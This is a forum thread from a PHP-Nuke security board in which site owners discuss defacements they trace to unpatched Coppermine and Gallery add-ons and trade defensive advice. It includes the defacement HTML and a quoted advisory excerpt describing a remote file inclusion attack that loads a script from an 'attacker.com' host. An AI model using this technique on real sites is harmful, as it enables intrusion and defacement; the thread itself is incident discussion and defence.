Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
cprompt
Regular
Regular


Joined: Jun 08, 2004
Posts: 64

PostPosted: Thu Nov 18, 2004 7:36 pm Reply with quote

I think I was hacked.
Running latest Sentinel on Nuke7.5 patched.
http auth activated.
My index.php was replaced with this index.php

Code:
<html>


<head>
<meta http-equiv="Content-Language" content="pt-br">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>===[MirrorTeam 2004]===</title>
</head>

<body bgcolor="#000000">

<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center"><b><font color="#FFFFFF">MirrorTeam </font></b></p>
<p align="center"><font color="#FFFFFF"><b>Bsd off!</b></font></p>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" height="47">
  <tr>
    <td width="100%" height="47">
    <p align="center"><b><font color="#FF0000">FreeBSD www10.powweb.com
    4.10-RELEASE FreeBSD 4.10-RELEASE #0: Sat Jul 10 20:43:09 PDT 2004 Only registered users can see links on this board! Get registered or login!:/usr/obj/usr/src/sys/POWWEB
    i386<br>
&nbsp;</font></b></td>
  </tr>
</table>
<p align="center"><a href="mailto:mirrorteam@email.com">mirrorteam@email.com</a></p>
<p align="center">&nbsp;</p>

</body>

</html>


That is all that was changed as far as I can tell.
 
View user's profile Send private message
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17077

PostPosted: Thu Nov 18, 2004 7:47 pm Reply with quote

Are you using coppermine?
 
View user's profile Send private message
TheosEleos
Life Cycles Becoming CPU Cycles


Joined: Sep 18, 2003
Posts: 960
Location: Missouri

PostPosted: Thu Nov 18, 2004 7:50 pm Reply with quote

If you are using coppermine what version?

_________________
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website AIM Address ICQ Number
cprompt
PostPosted: Thu Nov 18, 2004 7:52 pm Reply with quote

OK it gets more interesting. Looks liek evreyone on the site has ADMin status in my Forums. I try changing their permissions back to User, but they don't hold.

I also had no user groups set up and now I have a user group setup with a member that I would not have made a moderator as the group mod...wierd.
 
cprompt
PostPosted: Thu Nov 18, 2004 7:53 pm Reply with quote

I use Coppermine but only my subdomain. Not on my main site which had the index replaced.
crap
v1.2.2b-Nuke
 
Raven
PostPosted: Thu Nov 18, 2004 7:56 pm Reply with quote

I believe the egg drop is placed at the server level and so they have access to all your site.
 
cprompt
PostPosted: Thu Nov 18, 2004 8:04 pm Reply with quote

So are we thinking coppermine may be the culprit? I have disabled it pending an upgrade.
I also run Gallery from menalto on the main site version 1.4.2. It need upgraded as well...


boy what a slacker I am. I guess this is just pie in my face so-to-speak.
 
cprompt
PostPosted: Thu Nov 18, 2004 8:14 pm Reply with quote

TheosEleos wrote:
If you are using coppermine what version?


Do you know where I can find the latest version? The link I have is broken.
 
oprime2001
Worker
Worker


Joined: Jun 04, 2004
Posts: 119
Location: Chicago IL USA

PostPosted: Thu Nov 18, 2004 9:16 pm Reply with quote

cprompt wrote:
So are we thinking coppermine may be the culprit? I have disabled it pending an upgrade.
I also run Gallery from menalto on the main site version 1.4.2. It need upgraded as well...


boy what a slacker I am. I guess this is just pie in my face so-to-speak.

Deactivating the coppermine module still leaves your site vulnerable. I had one of my sites defaced when the skiddies used an inactive coppermine theme that I had left unpatched. Remove/rename your inactive coppermine folder and/or coppermine themes.
 
View user's profile Send private message
Raven
PostPosted: Thu Nov 18, 2004 10:26 pm Reply with quote

cprompt wrote:
So are we thinking coppermine may be the culprit? I have disabled it pending an upgrade.
I also run Gallery from menalto on the main site version 1.4.2. It need upgraded as well...


boy what a slacker I am. I guess this is just pie in my face so-to-speak.
For sure. I had 2 egg drops last week on my server because of clients who were running unpatched versions.
 
oprime2001
PostPosted: Thu Nov 18, 2004 10:46 pm Reply with quote

Do you also run the SPChat module? I noticed that you were defaced by skiddies going by MirrorTeam. They seem to be Only registered users can see links on this board! Get registered or login!.
 
oprime2001
PostPosted: Thu Nov 18, 2004 11:03 pm Reply with quote

Raven wrote:
For sure. I had 2 egg drops last week on my server because of clients who were running unpatched versions.
don't mean to thread-jack, but I am not sure what Raven means by eggdrop. by eggdrop, do you mean Remote File Inclusion such as:

(from Only registered users can see links on this board! Get registered or login!)
Quote:
E2 - affected is new version:

First get ready your php script in "http://attacker.com/user_list_info_box.inc"
and then:
Only registered users can see links on this board! Get registered or login! Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login!

Or do you mean an actual file (egg) is uploaded (dropped) on the server? I'm not aware of a coppermine vulnerability that allows a file to be uploaded to the server. I have seen instances where the Remote File Inclusion was used to create/modify a file on the host server, but the created/modified file is not directly uploaded from the remote server. Regardless, NukeSentinel should catch the Remote File Inclusion attack because of the Only registered users can see links on this board! Get registered or login! in the url.
 
Raven
PostPosted: Thu Nov 18, 2004 11:06 pm Reply with quote

An actual file is uploaded to your server. It's done through CM upload facility if I remember right.
 
cprompt
PostPosted: Fri Nov 19, 2004 5:31 am Reply with quote

OK then I gueess it's more serious than I thought.
If they dropped a file on my server, how on earth do I find it? PHP-Nuke has hundreds of files.
Is version 1.3 of Coppermine safe?
Is anyone safe? hehe
More and more it seems like it is not necessarily PHP-Nuke that is vulnerable, it is the addons and modules.

I got coppermine updated and Gallery updated. I am running SPchat on both the main and subdomain sites.
I have removed the SPChat for now on both sites.
 
cprompt
PostPosted: Fri Nov 19, 2004 5:36 am Reply with quote

I FOUND IT!!!!!

it is called cancer. It was in my subdomain main directory.

Here is the file if anyone wants to take a look at it.

Admin note: I removed it as it could be used by other srcipt kiddies.
 
jaded
Theme Guru


Joined: Nov 01, 2003
Posts: 1006

PostPosted: Fri Nov 19, 2004 8:13 am Reply with quote

I swear to God all web hosts should DEMAND that their clients are not using coppermine or my_egallery. As I stated in another post a few minutes ago. We too have had clients who were eggdropped through gallery. We have banned it. Using them is cause for immediate suspension and or termination. It will be a better day when all web hosts do the same! I wish you luck and hope that you removed all the malicious files. BE 100% sure to totally remove the gallery and ALL references to it including your admin folders.

_________________
Themes BB Skins Only registered users can see links on this board! Get registered or login!
Graphic Tees Only registered users can see links on this board! Get registered or login!
Paranormal Tees Only registered users can see links on this board! Get registered or login!
Ghost Stories & More Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
cprompt
PostPosted: Fri Nov 19, 2004 10:16 am Reply with quote

cprompt wrote:
Admin note: I removed it as it could be used by other srcipt kiddies.


thanks...sorry about that.
 
truckerclock
New Member
New Member


Joined: Jan 18, 2005
Posts: 7

PostPosted: Wed Jan 19, 2005 1:11 am Reply with quote

The same thing happened to me today, my index.php was replaced and all other files deleted. I do have the menalto gallery on my site, is this most likely the problem? I guess the only other way to change the file on the server would be to hack the server or know my password? I also was attacked a couple of days ago, before I had sentinel installed and they changed some files in my sql. After I installed it, I tested it and it seemed to be secure. Are these things most likely random attempts or is someone just targeting me? I have never had problems with security before and am new to this, so any help would be appreciated.

Truckerclock
 
View user's profile Send private message
Raven
PostPosted: Wed Jan 19, 2005 5:02 am Reply with quote

Depending on the version of Menalto, that is most likely the cause. Anytime uploads are allowed, one has to be ever so careful. NukeSentinel does not (and really can't) address holes in 3rd party software.
 
djmaze
Subject Matter Expert


Joined: May 15, 2004
Posts: 719
Location: http://tinyurl.com/5z8dmv

PostPosted: Wed Jan 19, 2005 6:14 am Reply with quote

jaded wrote:
I swear to God all web hosts should DEMAND that their clients are not using coppermine or my_egallery.


And all webhosts guarantee to upgrade apache, php and mysql to latest builds to reduce hack attempts as well ?
Not only customers have a lack to upgrade their software.

Also most hacks are made AFTER a vulnerability is found by someone.
A fix for a vulnerability is 90% of the time released before the first hacker has managed to build a script to hack it.
 
View user's profile Send private message Visit poster's website
truckerclock
PostPosted: Wed Jan 19, 2005 6:50 am Reply with quote

My site just got hacked again this morning. If uploads by users is turned off in gallery would it make it any safer? I cannot understand why I am being hit so often all of the sudden. This site has been up for almost a year with the same software and no problems, however my site just actually got ranked well in google. My site does not deal with money at all and is just a site for auto enthusiasts. I am using nuke 7.2, should I upgrade to a newer version for safety? I going home now to try to restore the site and secure it.
 
Raven
PostPosted: Wed Jan 19, 2005 6:59 am Reply with quote

Yes, turn off uploads and see if you get hacked anymore.
 
oprime2001
PostPosted: Wed Jan 19, 2005 9:04 am Reply with quote

You haven't listed any of your other installed modules. It is unsafe/unwise to assume that the problem lies within Menalto Gallery or any other module unless you've verified the exploit within your server logs. If you don't have access to your server logs, ask your hosts for them. Otherwise, you are merely guessing as to which security hole to plug.

There was a Only registered users can see links on this board! Get registered or login! from November 2004 on the Only registered users can see links on this board! Get registered or login!, but a later release has fixed this issue. A quick check at the Only registered users can see links on this board! Get registered or login! at Only registered users can see links on this board! Get registered or login! doesn't bring up any relevant hits.

There are countless other modules with abundant vulnerabilities. Inactive/admin-only modules can still be exploited. Make sure you are trying to fix the actual problem.
 
truckerclock
PostPosted: Wed Jan 19, 2005 9:38 am Reply with quote

I have just deleted everything off of the server and am going to install the patched version of 7.5 and then nuke sentinel and then restrict some access with the .htaccess file. I have downloaded the raw log from my server but am not sure what I am looking for. It shows when every single file was accessed. Around the time I saw it was defaced this morning, there was a lot of activity in the gallery. Is there anyway to tell by the url requested which one was trying to get access? Any unusual stuff in the url? My web host is checking into it also. Thanks for all of your help!

Truckerclock
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©